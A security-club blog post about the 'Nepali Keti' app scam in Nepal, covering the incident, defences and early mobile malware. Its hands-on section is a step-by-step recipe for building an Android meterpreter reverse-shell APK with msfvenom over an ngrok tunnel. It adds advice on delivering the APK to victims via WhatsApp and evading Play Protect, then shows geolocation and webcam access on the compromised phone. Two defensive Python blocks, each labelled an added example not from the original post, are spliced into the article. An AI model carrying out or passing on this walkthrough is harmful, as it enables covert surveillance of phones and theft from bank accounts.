Nepali Keti — A Goliath Scam

HackTheBox SRMIST
8 min read · Apr 24, 2023


Overview of the Attack on Nepali Keti

Several people were arrested in Nepal when it was alleged that they had used the "Nepali Keti" mobile app to break into bank accounts and steal money. The app was created by a Nepali national living in Australia and was promoted as a way for Nepali women to meet new people and find potential partners. The suspects used it to harvest private data such as bank account numbers, passwords and OTPs, which they then used to commit fraud. The police made the arrests after a victim reported that a sizable sum of money had been taken. The incident underlines the need for caution when handling personal information on a mobile device.

Impact of The Attack

Cyberattacks against banks can significantly affect their daily operations, public image and financial viability. They may lead to the theft of private customer data, monetary losses and service interruptions. Beyond the direct financial loss, a successful attack damages a bank's brand and reduces consumer trust, and legal liability and regulatory penalties are possible outcomes. To lessen the effects of cyberattacks, banks must invest in cybersecurity defences, carry out regular security audits, and train staff and customers in safe online practices.

Data breaches can seriously affect bank customers' financial security, personal information and privacy. Theft of sensitive information such as social security numbers, account details and personal identification data can lead to identity theft and fraud, with long-lasting effects on the victims' financial stability. The invasion of privacy and misuse of personal data can also cause the victims emotional distress and worry.

Eight people had earlier reported the group to the Cyber Bureau, and 12 people had reported the gang to the Kathmandu Valley Crime Investigation Office. The complaints filed with the Bureau and the Kathmandu Crime Investigation Office covered frauds totalling Rs 2.6 million and Rs 2 million respectively.

Therefore, be careful next time; otherwise, it will be tough to afford your next date 😏

Root Causes and Motives behind the Attack on Nepali Keti

A lack of awareness of cyberattacks, poorly protected user profiles and the absence of security initiatives have been identified as the root causes of this incident. Police have arrested eight individuals who withdrew hundreds of thousands of rupees from bank accounts compromised through a malicious app called "Nepali Keti". The attackers could access sensitive information and exploit it to empty accounts, a serious breach of trust and security. Multiple banks have reported customers suffering financial and data losses. The warning highlights the severity of the issue and the urgent need for action to address it.

According to the authorities, the group gained access to the device of anyone who installed the app and used the information it collected to empty bank accounts. Attackers of this kind target individuals, businesses or financial institutions to obtain sensitive data such as card numbers, personal details or login credentials, which they then use to access bank accounts, steal money or demand ransom payments.

Hands-On: How This Kind of Attack Works

  1. First of all, create an ngrok account and install the ngrok agent on your system. (ngrok is a tunnelling service that exposes a port on your machine through a public address.)
  2. Using ngrok, open a TCP tunnel to port 4444:
┌──(root㉿kali)-[~]
└─$ ngrok tcp 4444
ngrok (Ctrl+C to quit)

Announcing ngrok-rs: The ngrok agent as a Rust crate: <https://ngrok.com/rust>

Session Status online
Account ***** (Plan: Free)
Update update available (version 3.2.2, Ctrl-U to update)
Version 3.1.0
Region *********
Latency 26ms
Web Interface <http://127.0.0.1:4040>
Forwarding tcp://0.tcp.in.ngrok.io:14976 -> localhost:4444

Connections ttl opn rt1 rt5 p50 p90
2 0 0.00 0.00 194.44 356.27

  3. Now use msfvenom to create the payload:

┌──(kali㉿kali)-[~]
└─$ msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.in.ngrok.io LPORT=14976 R> Nepali_Keti.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10242 bytes

-p selects the payload; as you can see, we are using the Android one.

LHOST and LPORT are the address and port the payload connects back to. Here they are the public ngrok endpoint from step 2, which forwards to port 4444 on the local machine.

R requests raw output, which for the Android payload is an APK; the redirect writes it to Nepali_Keti.apk.

→ You can also encode the program to avoid Google Play Protect detection.

  4. You now have an APK file, which is sent to the victim through WhatsApp or any other medium.

  5. On installation the app requests permissions, which have to be granted on the victim's side.

  6. Next, start msfconsole and select the generic payload handler:

┌──(kali㉿kali)-[~]
└─$ msfconsole

IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\\`.""'.
II 6. .P : .' / | \\ `. :
II 'T;. .;P' '.' / | \\ `.'
II 'T; ;P' `. / | \\ .'
IIIIII 'YvP' `-.__|__.-'

I love shells --egypt
=[ metasploit v6.3.4-dev ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit tip: View all productivity tips with the
tips command
Metasploit Documentation: <https://docs.metasploit.com/>

msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >

  7. Set the payload along with LHOST and LPORT:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) >

  8. Now run the handler and wait for the payload to connect back:

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Sending stage (78189 bytes) to 127.0.0.1
[*] Sending stage (78189 bytes) to 127.0.0.1
[-] Failed to load client portion of stdapi.
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:36462) at 2023-04-16 03:34:33 -0400
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36458) at 2023-04-16 03:34:33 -0400

  9. It's the "Access Granted" scene. The help command lists everything you can do from the session.

  10. For example, here we use geolocate and webcam_list:

meterpreter > geolocate
[*] Current Location:
Latitude: 22.8271289
Longitude: 90.0495526

To get the address: <https://maps.googleapis.com/maps/api/geocode/json?latlng=22.8271289,90.0495526&sensor=true>
meterpreter > webcam_list

1: Back Camera
2: Front Camera
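As an added defensive example (this is not code from the original post), the following Python script performs a static triage of an APK such as the Nepali_Keti.apk built above before it is ever installed. It assumes that an APK is a ZIP archive whose binary AndroidManifest.xml keeps permission names in its string pool as UTF-8 or UTF-16LE, and that an unmodified msfvenom Android stager keeps its default package name com.metasploit.stage; both are assumptions stated in the code. The two sample APKs it scans are constructed in memory for the demonstration and are not real apps.

```python
"""Static triage of an APK received over chat (added example, not from the original post).

Assumptions (not stated on the page): an APK is a ZIP; the binary AndroidManifest.xml keeps
its string pool as UTF-8 or UTF-16LE, so permission names can be found by a byte search in
either encoding; the stock msfvenom Android stager uses the package 'com.metasploit.stage',
which shows up in classes.dex as 'com/metasploit/stage'.
"""
import hashlib
import io
import zipfile

# Permissions that together indicate spyware-like capability (camera, location,
# SMS/OTP interception), chosen to match what the walkthrough above exercises.
HIGH_RISK_PERMISSIONS = [
    "android.permission.CAMERA",
    "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
    "android.permission.RECORD_AUDIO",
    "android.permission.READ_CONTACTS",
]

# Byte markers of the stock Metasploit Android stager (assumption, see module docstring).
PAYLOAD_MARKERS = [b"com/metasploit/stage", b"com.metasploit.stage"]


def contains_text(blob: bytes, text: str) -> bool:
    """True if text appears in blob as UTF-8 or as UTF-16LE (AXML string pools use either)."""
    return text.encode("utf-8") in blob or text.encode("utf-16-le") in blob


def triage_apk(apk_bytes: bytes) -> dict:
    """Return a risk report: sha256, high-risk permissions, payload markers, score, verdict."""
    report = {"sha256": hashlib.sha256(apk_bytes).hexdigest(),
              "permissions": [], "payload_markers": [], "score": 0, "verdict": "low"}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        names = set(zf.namelist())
        manifest = zf.read("AndroidManifest.xml") if "AndroidManifest.xml" in names else b""
        dex_blobs = [zf.read(n) for n in names if n.startswith("classes") and n.endswith(".dex")]
        # A v1-signed APK carries a META-INF/*.RSA, .DSA or .EC block; its absence is one
        # more reason to distrust a package that arrived outside the official store.
        signed = any(n.startswith("META-INF/") and n.upper().endswith((".RSA", ".DSA", ".EC"))
                     for n in names)
    for perm in HIGH_RISK_PERMISSIONS:
        if contains_text(manifest, perm):
            report["permissions"].append(perm)
    for blob in dex_blobs:
        for marker in PAYLOAD_MARKERS:
            if marker in blob and marker.decode() not in report["payload_markers"]:
                report["payload_markers"].append(marker.decode())
    # Weights are constructed for the demo: a stager marker alone is decisive.
    score = len(report["permissions"]) * 2 + len(report["payload_markers"]) * 10
    if not signed:
        score += 3
    report["unsigned"] = not signed
    report["score"] = score
    report["verdict"] = "high" if score >= 10 else "medium" if score >= 4 else "low"
    return report


def build_sample_apk(dex_marker: bytes, perms) -> bytes:
    """Construct a minimal fake APK for the demo (constructed data, not a real app)."""
    # Fake AXML: a header-like prefix followed by UTF-16LE strings, enough for the byte search.
    manifest = b"\x03\x00\x08\x00" + b"".join(p.encode("utf-16-le") + b"\x00\x00" for p in perms)
    dex = b"dex\n035\x00" + dex_marker + b"\x00"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", manifest)
        zf.writestr("classes.dex", dex)
    return buf.getvalue()


# Constructed samples: one resembling an unmodified stager, one resembling a harmless app.
SUSPICIOUS_APK = build_sample_apk(
    b"Lcom/metasploit/stage/Payload;",
    ["android.permission.CAMERA", "android.permission.ACCESS_FINE_LOCATION",
     "android.permission.RECEIVE_SMS"])
BENIGN_APK = build_sample_apk(b"Lcom/example/notes/MainActivity;", ["android.permission.INTERNET"])

if __name__ == "__main__":
    for label, apk in (("suspicious", SUSPICIOUS_APK), ("benign", BENIGN_APK)):
        r = triage_apk(apk)
        print(label, r["verdict"], r["score"], r["permissions"], r["payload_markers"])
```

Run it as-is to see the two verdicts; for a real file, pass the bytes of the downloaded APK to triage_apk and compare the sha256 against a threat-intelligence feed. String matching on the manifest and dex is a cheap first pass only: a repackaged or obfuscated payload can rename its package, so a positive match is strong evidence while a negative match proves nothing.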

Best Practices to Protect from Such Attacks

  1. Multi-Factor Authentication (MFA) — Requiring a robust second factor for sensitive banking actions is one of the most effective measures, and it matters even more on a device where an APK from outside the official store has been installed. Binding that factor to hardware characteristics of the mobile device makes stolen identifiers much harder to reuse.
  2. Monitoring for fraud and suspicious activity across many channels — Banks can use an enterprise view and fraud-reporting function to aggregate information from many sources and channels (cheques, online account access and electronic payments) to understand a customer's account and spot unusual activity. Machine-learning scoring models, customer profiling, rules and alerts combine to produce a risk assessment for each customer account. Simility and IBM Safer Payments are two advanced transaction-monitoring systems.
  3. Safety checks for any APK that reaches you through social media — scanning the package before installing it gives a risk calculation of whether it is safe.
  4. Regular malware inspection and removal — Customers and even bank staff have fallen for scams that trick them into visiting websites that install malicious software on their computers, enabling thieves to make off with enormous sums. Once a computer or mobile device is infected, the attacker can monitor keystrokes, read emails, take screenshots and steal the data that gives them access to money. Banks must use up-to-date security tools to find and remove such malware.
  5. Customer email and text alerts — One particularly effective fraud-detection strategy alerts customers when there is unexpected activity on their accounts from a mobile device. If, for example, an electronic payment is made to a new payee, the bank may send a text message asking the customer to confirm that the transaction is genuine. This method has been shown to prevent fraud and improve customer trust.
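Items 2 and 5 above describe rule-based transaction monitoring and a confirmation message for a payment to a new payee. The following Python code is an added example of such a rule engine; it is not the post's own code and not either product named above, and the customers, transfers, rule weights, thresholds and the 10-minute velocity window are all constructed for the demonstration.

```python
"""Rule-based transaction monitoring with step-up confirmation.

Added example, not from the original post. Customers, transfers, rule weights,
thresholds and the velocity window are all constructed assumptions.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta


@dataclass
class Customer:
    customer_id: str
    known_payees: set
    known_devices: set
    typical_amount: float                        # assumed precomputed from the customer's history
    recent: list = field(default_factory=list)   # timestamps of recent transfers


@dataclass
class Transfer:
    payee: str
    amount: float
    device_id: str
    at: datetime


def score_transfer(cust: Customer, tx: Transfer,
                   window: timedelta = timedelta(minutes=10), velocity_limit: int = 3) -> dict:
    """Apply the rules and return the score, the reasons and the action the bank takes."""
    score, reasons = 0, []
    if tx.payee not in cust.known_payees:
        score += 40
        reasons.append("new payee")
    if tx.device_id not in cust.known_devices:
        score += 30
        reasons.append("unrecognised device")
    if tx.amount > cust.typical_amount:
        score += 20
        reasons.append("amount above customer profile")
    burst = [t for t in cust.recent if timedelta(0) <= tx.at - t <= window]
    if len(burst) >= velocity_limit:
        score += 40
        reasons.append("transfer velocity")
    # Step-up: a held transfer is verified out of band (voice call, in-app push), never by
    # SMS alone, because a phone running spyware of the kind above can read the bank's texts.
    if score >= 70:
        action = "hold_and_verify_out_of_band"
    elif score >= 40:
        action = "sms_confirm"
    else:
        action = "allow"
    return {"score": score, "action": action, "reasons": reasons}


def process(cust: Customer, transfers) -> list:
    """Score transfers in time order, updating the customer's profile as transfers pass."""
    decisions = []
    for tx in sorted(transfers, key=lambda t: t.at):
        decision = score_transfer(cust, tx)
        decisions.append(decision)
        cust.recent.append(tx.at)
        if decision["action"] == "allow":
            cust.known_payees.add(tx.payee)   # learn only from transfers that were allowed
    return decisions


def alert_text(tx: Transfer, decision: dict) -> str:
    """Customer alert in the style of item 5 (wording is constructed)."""
    return (f"Transfer of Rs {tx.amount:,.0f} to {tx.payee} flagged: "
            f"{', '.join(decision['reasons'])}. Action: {decision['action']}.")


def demo() -> list:
    """Constructed scenario: one normal payment, then a burst to new payees from a new device."""
    t0 = datetime(2023, 4, 16, 3, 34)
    cust = Customer("C-1001", {"rent-landlord", "electricity-bill"}, {"phone-a1"},
                    typical_amount=15000.0)
    transfers = [
        Transfer("rent-landlord", 12000.0, "phone-a1", t0),
        Transfer("mule-7781", 25000.0, "phone-zz9", t0 + timedelta(minutes=2)),
        Transfer("mule-7782", 9000.0, "phone-zz9", t0 + timedelta(minutes=3)),
        Transfer("mule-7783", 9000.0, "phone-zz9", t0 + timedelta(minutes=4)),
        Transfer("friend-ram", 2000.0, "phone-a1", t0 + timedelta(minutes=16)),
    ]
    ordered = sorted(transfers, key=lambda t: t.at)
    return list(zip(ordered, process(cust, transfers)))


if __name__ == "__main__":
    for tx, d in demo():
        print(tx.at.time(), d["score"], alert_text(tx, d))
```

The design choice worth noting: a transfer from an unrecognised device to a new payee is held and verified through a channel other than SMS, because a device compromised in the way described above can read incoming OTP and confirmation texts; the SMS confirmation of item 5 is reserved for the lower-risk case of a new payee from the customer's usual device.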

Similar Incidents of Attack

In the cyber world nothing is one hundred percent secure, and that is the truth.

The mobile phone was introduced in the 1970s and was the greatest invention of its time. Great as it was, it needed to be more secure: in 2004 the first malware for mobile phones was identified, and new malware has been recognised continually ever since.

Given below is a list of some mobile phone malware.

  1. Cabir (2004) → Cabir is a computer worm developed in 2004 to infect mobile phones running the Symbian operating system (Series 60 in particular). It is believed to be the first computer worm able to infect mobile phones. When a phone is infected with Cabir, the message "Caribe" appears on the display every time the phone is turned on. The worm then attempts to spread to nearby phones over Bluetooth. The biggest issue is the phone's battery draining quickly because of the constant Bluetooth use and the frequent prompt messages from Caribe.
  2. FakePlayer (2010) → In October 2010, the FakePlayer Trojan made the leap from PCs to smartphones, infecting Android users by hiding in a media player app called "Movie Player". Disguised as a media player, FakePlayer sent SMS messages to the premium numbers 3353 and 3354, each costing about $5. The malicious application is approximately 13 KB and becomes active when the user runs the media player application. It has default Android extensions GER (file format). It was the first mobile virus to cause direct financial loss to its victims.

References

Article:

Eight arrested for hacking bank accounts using ‘Nepali Keti’ app

Contribution

Writers:

Akshay Raj | Sudoer

Mehul Dadlani | Binary

Nasir Hussain | Binary

Gurupreet Singh | Binary

Khushi Tiwari | Binary

Nawnit Singh | Binary

Designers:

Abhinav Shandilya | Sudoer

Omar Ansari | Sticky Bit


HackTheBox SRMIST

HackTheBox SRMIST focuses on training the next-gen of cyber-warriors transforming the cyber space in SRMIST and beyond. https://www.htbsrmist.tech